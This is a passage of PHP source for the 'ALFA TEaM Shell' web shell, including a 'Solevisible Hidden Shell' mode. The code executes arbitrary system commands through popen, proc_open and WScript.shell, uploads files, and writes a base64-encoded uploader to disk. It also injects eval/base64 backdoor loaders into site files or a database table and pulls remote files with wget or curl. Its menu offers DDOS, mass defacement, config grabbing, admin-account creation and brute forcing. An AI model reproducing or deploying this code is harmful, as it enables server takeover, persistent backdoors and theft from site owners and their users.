if(is_resource($f = @popen($in,"r"))){

$out = "";

while(!@feof($f))

$out .= fread($f,1024);

pclose($f);

}

}elseif(function_exists('proc_open')){

$pipes = array();

$process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);

$out=@stream_get_contents($pipes[1]);

}elseif(class_exists('COM')){

$alfaWs = new COM('WScript.shell');

$exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);

$stdout = $exec->StdOut();

$out=$stdout->ReadAll();

}

}catch(Exception $e){}

return $out;

}

function _alfa_fsockopen($server,$uri,$post){

    $socket = @fsockopen($server, 80, $errno, $errstr, 15);

    if($socket){

        $http  = "POST {$uri} HTTP/1.0\r\n";

        $http .= "Host: {$server}\r\n";

        $http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";

        $http .= "Content-Type: application/x-www-form-urlencoded\r\n";

        $http .= "Content-length: " . strlen($post) . "\r\n";

        $http .= "Connection: close\r\n\r\n";

        $http .= $post . "\r\n\r\n";

        fwrite($socket, $http);

        $contents = "";

        while (!@feof($socket)) {

            $contents .= @fgets($socket, 4096);

        }

        list($header, $body) = explode("\r\n\r\n", $contents, 2);

        @fclose($socket);

        return $body;

    }else{

        return "";

    }

}

if(isset($_GET["solevisible"])){

@error_reporting(E_ALL ^ E_NOTICE);

echo '';

echo "Solevisible Hidden Shell";

echo "";

echo 'Kernel : '.(function_exists('php_uname')?php_uname():'???').'';

$safe_mode = @ini_get('safe_mode');

if($safe_mode){$r = "On";}else{$r = "Off";}

echo "
OS: " . PHP_OS . "
";

echo "Software: " . $_SERVER ['SERVER_SOFTWARE'] . "
";

echo "PHP Version: " . PHP_VERSION .  "
";

echo "PWD: " . str_replace("\\","/",@alfaGetCwd()) . "/
";

echo "Safe Mode : $r
";

echo"Disable functions : ";

$disfun = @ini_get('disable_functions');

if(empty($disfun)){$disfun = 'NONE';}

echo"";

echo "$disfun";

echo"
";

echo "Your Ip Address is :  " . $_SERVER['REMOTE_ADDR'] . "
";

echo "Server Ip Address is :  ".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."
";

echo '
';

echo 'CWD: 
';

if(isset($_FILES['file'])){

if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo 'Upload Successfully ;)

'; }

else{echo 'Upload failed :(

'; }

}

echo '
Execute Command: 


';

if(isset($_POST['command_solevisible'])){

if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';';

$solevisible = "cd '".addslashes(str_replace("\\","/",@alfaGetCwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']);

echo alfaEx($solevisible);

}

echo'

										

										

										

										
';
										

										

										

										
exit;}
										

										

										

										
@error_reporting(E_ALL ^ E_NOTICE);
										

										

										

										
@ini_set('error_log',NULL);
										

										

										

										
@ini_set('log_errors',0);
										

										

										

										
@ini_set('max_execution_time',0);
										

										

										

										
@ini_set('magic_quotes_runtime', 0);
										

										

										

										
@set_time_limit(0);
										

										

										

										
if(function_exists('set_magic_quotes_runtime')){
										

										

										

										
@set_magic_quotes_runtime(0);
										

										

										

										
}
										

										

										

										
foreach($_POST as $key => $value){
										

										

										

										
if(is_array($_POST[$key])){
										

										

										

										
$i=0;
										

										

										

										
foreach($_POST[$key] as $f) {
										

										

										

										
$f = trim(str_replace(' ', '+',$f));
										

										

										

										
$_POST[$key][$i] = decrypt_post($f);
										

										

										

										
$i++;
										

										

										

										
}
										

										

										

										
}else{
										

										

										

										
$value = trim(str_replace(' ', '+',$value));
										

										

										

										
$_POST[$key] = decrypt_post($value);
										

										

										

										
}
										

										

										

										
}
										

										

										

										
$default_action = 'FilesMan2';//'FilesMan';
										

										

										

										
$default_use_ajax = true;
										

										

										

										
$default_charset = 'Windows-1251';
										

										

										

										
if(strtolower(substr(PHP_OS,0,3))=="win")
										

										

										

										
$GLOBALS['sys']='win';
										

										

										

										
else
										

										

										

										
$GLOBALS['sys']='unix';
										

										

										

										
$GLOBALS['home_cwd'] = @alfaGetCwd();
										

										

										

										
$GLOBALS["need_to_update_header"] = "false";
										

										

										

										
$GLOBALS['glob_chdir_false'] = false;
										

										

										

										
if(isset($_POST['c'])){
										

										

										

										
if(!@chdir($_POST['c'])){
										

										

										

										
 $GLOBALS['glob_chdir_false'] = true;
										

										

										

										
}
										

										

										

										
}
										

										

										

										
$GLOBALS['cwd'] = (isset($_POST['c']) && @is_dir($_POST['c']) ?$_POST['c']:@alfaGetCwd());
										

										

										

										
if($GLOBALS['glob_chdir_false']){
										

										

										

										
 $GLOBALS['cwd'] = (isset($_POST['c']) && !empty($_POST['c']) ? $_POST['c'] : @alfaGetCwd());
										

										

										

										
}
										

										

										

										
if($GLOBALS['sys'] == 'win'){
										

										

										

										
$GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
										

										

										

										
$GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
										

										

										

										
}
										

										

										

										
if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';
										

										

										

										
if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}
										

										

										

										
if(!function_exists("mb_strlen")){
										

										

										

										
 function mb_strlen($str, $c=""){
										

										

										

										
 return strlen($str);
										

										

										

										
 }
										

										

										

										
}
										

										

										

										
if(!function_exists("mb_substr")){
										

										

										

										
 function mb_substr($str, $start, $end, $c=""){
										

										

										

										
 return substr($str, $start, $end);
										

										

										

										
 }
										

										

										

										
}
										

										

										

										
define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));
										

										

										

										
function alfahead(){
										

										

										

										
$GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+Ym9va2luZ3NAY2l0eXRvY291bnRyeXJldHJlYXQuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
										

										

										

										
$alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';
										

										

										

										
define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");
										

										

										

										
if(!isset($_POST['ajax'])){
										

										

										

										
function Alfa_GetDisable_Function(){
										

										

										

										
$disfun = @ini_get('disable_functions');
										

										

										

										
$afa = 'All Functions Accessible';
										

										

										

										
if(empty($disfun))return($afa);
										

										

										

										
$s = explode(',',$disfun);
										

										

										

										
$s = array_unique($s);
										

										

										

										
$i=0;
										

										

										

										
$b=0;
										

										

										

										
$func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');
										

										

										

										
$black_list = array();
										

										

										

										
$allow_list = array();
										

										

										

										
foreach($s as $d){
										

										

										

										
 $d=trim($d);
										

										

										

										
 if(empty($d)||!is_callable($d))continue;
										

										

										

										
 if(!function_exists($d)){
										

										

										

										
 if(in_array($d,$func)){
										

										

										

										
 $dis .= $d." | ";$b++;
										

										

										

										
 $black_list[] = $d;
										

										

										

										
 }else{
										

										

										

										
 $allow_list[] = $d;
										

										

										

										
 }
										

										

										

										
 $i++;
										

										

										

										
 }
										

										

										

										
}
										

										

										

										
if($i==0)return($afa);
										

										

										

										
if($i <= count($func)){
										

										

										

										
$all = array_values(array_merge($black_list, $allow_list));
										

										

										

										
return(''.implode(" | ", $all).'');
										

										

										

										
}
										

										

										

										
return(''.$dis.'Show All ('.$i.')');
										

										

										

										
}
										

										

										

										
function AlfaNum(){
										

										

										

										
$args = func_get_args();
										

										

										

										
$alfax = array();
										

										

										

										
$find = array();
										

										

										

										
for($i=1;$i<=10;$i++){
										

										

										

										
$alfax[] = $i;
										

										

										

										
}
										

										

										

										
foreach($args as $arg){
										

										

										

										
$find[] = $arg;
										

										

										

										
}
										

										

										

										
echo '';
										

										

										

										
}
										

										

										

										
if(empty($_POST['charset']))
										

										

										

										
$_POST['charset'] = $GLOBALS['default_charset'];
										

										

										

										
$freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';
										

										

										

										
$totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';
										

										

										

										
$totalSpace = $totalSpace?$totalSpace:1;
										

										

										

										
$on=" ON ";
										

										

										

										
$of=" OFF ";
										

										

										

										
$none=" NONE ";
										

										

										

										
if(function_exists('ssh2_connect'))
										

										

										

										
$ssh2=$on;
										

										

										

										
else
										

										

										

										
$ssh2=$of;
										

										

										

										
if(function_exists('curl_version'))
										

										

										

										
$curl=$on;
										

										

										

										
else
										

										

										

										
$curl=$of;
										

										

										

										
if(function_exists('mysql_get_client_info')||class_exists('mysqli'))
										

										

										

										
$mysql=$on;
										

										

										

										
else
										

										

										

										
$mysql=$of;
										

										

										

										
if(function_exists('mssql_connect'))
										

										

										

										
$mssql=$on;
										

										

										

										
else
										

										

										

										
$mssql=$of;
										

										

										

										
if(function_exists('pg_connect'))
										

										

										

										
$pg=$on;
										

										

										

										
else
										

										

										

										
$pg=$of;
										

										

										

										
if(function_exists('oci_connect'))
										

										

										

										
$or=$on;
										

										

										

										
else
										

										

										

										
$or=$of;
										

										

										

										
if(@ini_get('disable_functions'))
										

										

										

										
$disfun=@ini_get('disable_functions');
										

										

										

										
else
										

										

										

										
$disfun="All Functions Enable";
										

										

										

										
if(@ini_get('safe_mode'))
										

										

										

										
$safe_modes="ON";
										

										

										

										
else
										

										

										

										
$safe_modes="OFF";
										

										

										

										
$cgi_shell="OFF";
										

										

										

										
if(@ini_get('open_basedir')){
										

										

										

										
$basedir_data = @ini_get('open_basedir');
										

										

										

										
if(strlen($basedir_data)>120){
										

										

										

										
$open_b=substr($basedir_data,0, 120)."...";
										

										

										

										
}else{
										

										

										

										
$open_b = $basedir_data;
										

										

										

										
}
										

										

										

										
}else{$open_b=$none;}
										

										

										

										
if(@ini_get('safe_mode_exec_dir'))
										

										

										

										
$safe_exe=@ini_get('safe_mode_exec_dir');
										

										

										

										
else
										

										

										

										
$safe_exe=$none;
										

										

										

										
if(@ini_get('safe_mode_include_dir'))
										

										

										

										
$safe_include=@ini_get('safe_mode_include_dir');
										

										

										

										
else
										

										

										

										
$safe_include=$none;
										

										

										

										
if(!function_exists('posix_getegid'))
										

										

										

										
{
										

										

										

										
$user = function_exists("get_current_user")?@get_current_user():"????";
										

										

										

										
$uid = function_exists("getmyuid")?@getmyuid():"????";
										

										

										

										
$gid = function_exists("getmygid")?@getmygid():"????";
										

										

										

										
$group = "?";
										

										

										

										
}else{
										

										

										

										
$uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");
										

										

										

										
$gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");
										

										

										

										
$user = $uid['name'];
										

										

										

										
$uid = $uid['uid'];
										

										

										

										
$group = $gid['name'];
										

										

										

										
$gid = $gid['gid'];
										

										

										

										
}
										

										

										

										
$cwd_links = '';
										

										

										

										
$path = explode("/", $GLOBALS['cwd']);
										

										

										

										
$n=count($path);
										

										

										

										
for($i=0; $i<$n-1; $i++) {
										

										

										

										
$cwd_links .= "".$path[$i]."/";
										

										

										

										
}
										

										

										

										
$drives = "";
										

										

										

										
foreach(range('a','z') as $drive)
										

										

										

										
if(@is_dir($drive.':\\'))
										

										

										

										
$drives .= '[ '.$drive.' ] ';
										

										

										

										
$csscode =' -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
										

										

										

										
echo '
										

										

										

										

										

										

										

										

										

										

										

										

										

										

										

										

										

										

										

										

										

										
										

										

										

										
..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM Shell - v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ::..
										

										

										

										
';
										

										

										

										
echo "
										

										

										

										

										

										
										

										

										

										

										

										
										

										

										

										

										

										
										

										

										

										

										

										
										

										

										

										

										

										

										

										

										

										
										

										

										

										

										

										
";
										

										

										

										
$cmd_uname = alfaEx("uname -a",false,false);
										

										

										

										
$uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !');
										

										

										

										
if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}
										

										

										

										
echo '
										

										

										

										

										

										

										

										

										

										

										

										

										

										

											

											

											
 

										

										

										

										

										

										

											

											

											

											

											

											

											

											

											

											
											

											

											

											

											

											';
											

											

											

											
for($s=1;$s<=10;$s++){
											

											

											

											
echo '
											

											';
											

											

											

											
}
											

											

											

											
echo '
											

											
											

											

											

											

											

											

											

											

											

											
											

											

											

											

											

											
';
												

												

												

												
if($GLOBALS['sys']=='unix'){
												

												

												

												
$useful_downloader = '';
												

												

												

												
if(!@ini_get('safe_mode')){
												

												

												

												
if(strlen(alfaEx("id",false,false))>0){
												

												

												

												
echo '';
												

												

												

												
}else{
												

												

												

												
echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
												

												

												

												
}
												

												

												

												
}else{
												

												

												

												
echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
												

												

												

												
}
												

												

												

												
}else{
												

												

												

												
echo '';
												

												

												

												
}
												

												

												

												
$quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == "1" or $quotes == "on"){$magic = 'ON';}else{$magic = 'OFF';}

echo '';

if($GLOBALS['sys']=="win"){

echo '';

}

echo '
												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												

												


												

													
														

															Uname:
															'.$uname.'
														

														

															User:
															'. $uid . ' [ ' . $user . ' ]  Group: ' . $gid . ' [ ' . $group . ' ] 
															alfa team 2012
														

														

															PHP:
															'.@phpversion(). '  Safe Mode: '.$safe_modes.'
														

														

															ServerIP:
															'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).'
																

																 Your IP: '.@$_SERVER["REMOTE_ADDR"].'
																

																
																
 		
														

														

															DateTime:
															'.date('Y-m-d H:i:s').'
														

														

															Domains:
															';

if($GLOBALS['sys']=='unix'){

$d0mains = _alfa_file("/etc/named.conf",false);

if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{

$count=0;

foreach($d0mains as $d0main){

if(@strstr($d0main,"zone")){

preg_match_all('#zone "(.*)"#', $d0main, $domains);

flush();

if(strlen(trim($domains[1][0])) > 2){

flush();

$count++;}}}

echo "$count Domains";}}

else{echo("Cant Read [ /etc/named.conf ]");}

echo '		
														

														

															HDD:
															Total:'.alfaSize($totalSpace).' Free:' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]
														

														

															useful:--------------
														

														

															Downloader: --------------
														

														

															Useful : ';
																

																

																

																
$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
																

																

																

																
$x=0;
																

																

																

																
foreach($userful as $item)if(alfaWhich($item)){$x++;echo ''.$item.'';}
																

																

																

																
if($x==0){echo "--------------";$GLOBALS["need_to_update_header"] = "true";}
																

																

																

																
echo '		
														

														

															Downloader: ';
																

																

																

																
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
																

																

																

																
$x=0;
																

																

																

																
foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo ''.$item2.'';}
																

																

																

																
if($x==0){echo "--------------";$GLOBALS["need_to_update_header"] = "true";}
																

																

																

																
echo '		
														

														

															Windows:';

echo alfaEx('ver',false,false);

echo '		
														

														

															Downloader: -------------
														

														

															Disable Functions: '.Alfa_GetDisable_Function().'
														

														

															CURL :'.$curl.' | SSH2 : '.$ssh2.' | Magic Quotes : '.$magic.' |  MySQL :'.$mysql.' | MSSQL :'.$mssql.' |  PostgreSQL :'.$pg.' |  Oracle :'.$or.' '.($GLOBALS['sys']=="unix"?'|  CGI : '.$cgi_shell:"").'
															
																

																
																
 		
														

														

															Open_basedir :'.$open_b.' | Safe_mode_exec_dir :'.$safe_exe.' |  Safe_mode_include_dir :'.$safe_include.'
														

														

															SoftWare: 
															'.@getenv('SERVER_SOFTWARE').'
														

														

															DRIVE:
															'.$drives.'
														

														

															PWD:
															'.$cwd_links.' [ Home Shell ] 
														

													
												








  • ';

    $li = array('proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Database Dumper','coldumper'=>'Column Dumper','hash'=>'En-Decoder','connect'=>'BC',

    'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools',

    'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','deziper'=>'DeCompressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors',

    'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher','config_grabber'=>'Config Grabber','fakepage'=>'Fake Page','archive_manager'=>'Archive Manager',

    'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','selfrm'=>'Remove Shell'

    );

    foreach($li as $key=>$value){

    echo('
  • '.$value.'
  • '."\n");

    }

    echo '
Alfa SettingsAbout Us'.(!empty($_COOKIE['AlfaUser']) && !empty($_COOKIE['AlfaPass']) ? 'LogOut':'').'
 File manager

New Tab +
';}else{

@error_reporting(E_ALL ^ E_NOTICE);

@ini_set('error_log',NULL);

@ini_set('log_errors',0);

@ini_set('max_execution_time',0);

@ini_set('magic_quotes_runtime', 0);

@set_time_limit(0);

}}

function alfalogout(){

@setcookie("AlfaUser", null, 2012);

@setcookie("AlfaPass", null, 2012);

unset($_COOKIE['AlfaUser'],$_COOKIE['AlfaPass']);

echo("ok");

}

function showAnimation($name){

    return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';

}

function __showicon($r){

    $s['btn']='http://solevisible.com/images/btn.png';

    $s['alfamini']='http://solevisible.com/images/alfamini.png';

    $s['loader']='http://solevisible.com/images/loader.svg';

    //return 'data:image/png;base64,'.__get_resource($s[$r]);

    return $s[$r];

}

function alfainbackdoor(){

alfahead();

echo '

| Install BackDoor |

| In File | | In DataBase | 
';

$error = 'Error In Inject BackDoor...!
File Loader is not Writable Or Not Exists...!';

$success= 'Success...!';

$textarea = "";

$select = "
Use:
 ";

$cwd = 'Example: /home/alfa/public_html/index.php';

if($_POST['alfa1']=='file'){

echo("

| In File |


{$select} 
Backdoor Loader:
  
Key: 
  {$textarea}

");

if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){

$method = $_POST['alfa2'];

$file = $_POST['alfa3'];

$shell = $_POST['alfa4'];

$key = str_replace(array('"','\''),'',trim($_POST['alfa5']));

if($key=='')$key='alfa';

if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}

$code = '\'.base"."64"."_dec"."ode(\$c));");$x("'.$shell.'");exit;}?>';

if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));__alert($success."
Run With: ".basename($file)."?alfa=".$key.'');}else{__alert($error);}}}

if($_POST['alfa1']=='db'){

echo("

| In DataBase |

".getConfigHtml('all')."

");

$table = array('td1' =>

array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),

'td2' =>

array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),

'td3' =>

array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),

'td4' =>

array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),

'td5' =>

array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true),

'td6' =>

array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50')

);

create_table($table);

echo("
{$select}
");

echo($textarea);

echo("

");

if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){

$dbhost = $_POST['alfa2'];

$dbuser = $_POST['alfa3'];

$dbpw = $_POST['alfa4'];

$dbname = $_POST['alfa5'];

$file = $_POST['alfa6'];

$method = $_POST['alfa7'];

$shell = $_POST['alfa8'];

$key = str_replace(array('"','\''),'',trim($_POST['alfa9']));

if($key=='')$key='alfa';

if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}

if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){

$code = '\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>';

if(@is_file($file)&&@is_writable($file)){

@mysqli_query($conn,'DROP TABLE `alfa_bc`');

@mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');

@mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');

@file_put_contents($file,$code."\n".@file_get_contents($file));

__alert($success."
Run With: ".basename($file)."?alfa=".$key.'');}else{__alert($error);}}}}

echo('
');

alfafooter();

}

function alfawhois(){

echo("

| Whois |


>');return false;\">
Url: 
  

");

if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){

$site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);

$target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site;

$data = @file_get_contents($target);

if($data==''){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}

$target = @json_decode($data,true);

echo __pre();

if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}}

echo("
");

}

function alfaremotedl(){

alfahead();

echo("

| Upload From Url |



>');return false;\">


Url: 
   



Path:
 



");

if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){

echo __pre();

$url = $_POST['alfa1'];

$path = $_POST['alfa2'];

echo('');

if(__download($url,$path)){

echo('Success...!');

}else{

echo('Error...!');

}

echo('');

}

echo("
");

alfafooter();

}

function __download($url,$path=false){

if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;

$saveas = basename(rawurldecode($url));

if($path){$saveas=$path.$saveas;}

if($content = __read_file($url)){

if(@is_file($saveas))@unlink($saveas);

if(__write_file($saveas, $content)){return true;}}

$buff = alfaEx("wget ".$url." -O ".$saveas);

if(@is_file($saveas)) return true;

$buff = alfaEx("curl ".$url." -o ".$saveas);

if(@is_file($saveas)) return true;

$buff = alfaEx("lwp-download ".$url." ".$saveas);

if(@is_file($saveas)) return true;

$buff = alfaEx("lynx -source ".$url." > ".$saveas);

if(@is_file($saveas)) return true;

$buff = alfaEx("GET ".$url." > ".$saveas);

if(@is_file($saveas)) return true;

$buff = alfaEx("links -source ".$url." > ".$saveas);

if(@is_file($saveas)) return true;

$buff = alfaEx("fetch -o ".$saveas." -p ".$url);

if(@is_file($saveas)) return true;

return false;

}

function clean_string($string){

  if(function_exists("iconv")){

      $s = trim($string);

      $s = iconv("UTF-8", "UTF-8//IGNORE", $s);

  }

  return $s;

}

function __read_file($file, $boom = true){

$content = false;

if($fh = @fopen($file, "rb")){

$content = "";

while(!feof($fh)){

$content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);

}

@fclose($fh);

}

if(empty($content)||!$content){

    $content = alfaEx("cat '".addslashes($file)."'");

}

return $content;

}

function alfaMarket(){

echo "
";

$curl = new AlfaCURL();

$content = $curl->Send("http://solevisible.com/market.php");

$data = @json_decode($content, true);

if(!empty($data)){

if($data["status"] == "open"){

    echo $data["content"];

}else{

    echo $data["error_msg"];

}

}else{

    echo "
Cant connect to the alfa market....! try later.
";

}

echo "
";

}

function alfaSettings(){

alfahead();

AlfaNum(6,7,8,9,10);

echo '

| Settings |

| Generall Setting | 
';

if($_POST["alfa8"] == "main"){

echo '

| Settings |

';

$lg_array = array('0'=>'No','1'=>'Yes');

$penc_array = array('false'=>'No','true'=>'Yes');

$protect_html = "";

$icon_html = "";

$postEnc_html = "";

$login_html = "";

$cgiapi_html = "";

foreach($lg_array as $key=>$val)$protect_html .= '';

foreach($lg_array as $key=>$val)$icon_html .= '';

foreach($penc_array as $key=>$val)$cgiapi_html .= '';

foreach($penc_array as $key=>$val)$postEnc_html .= '';

$lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");

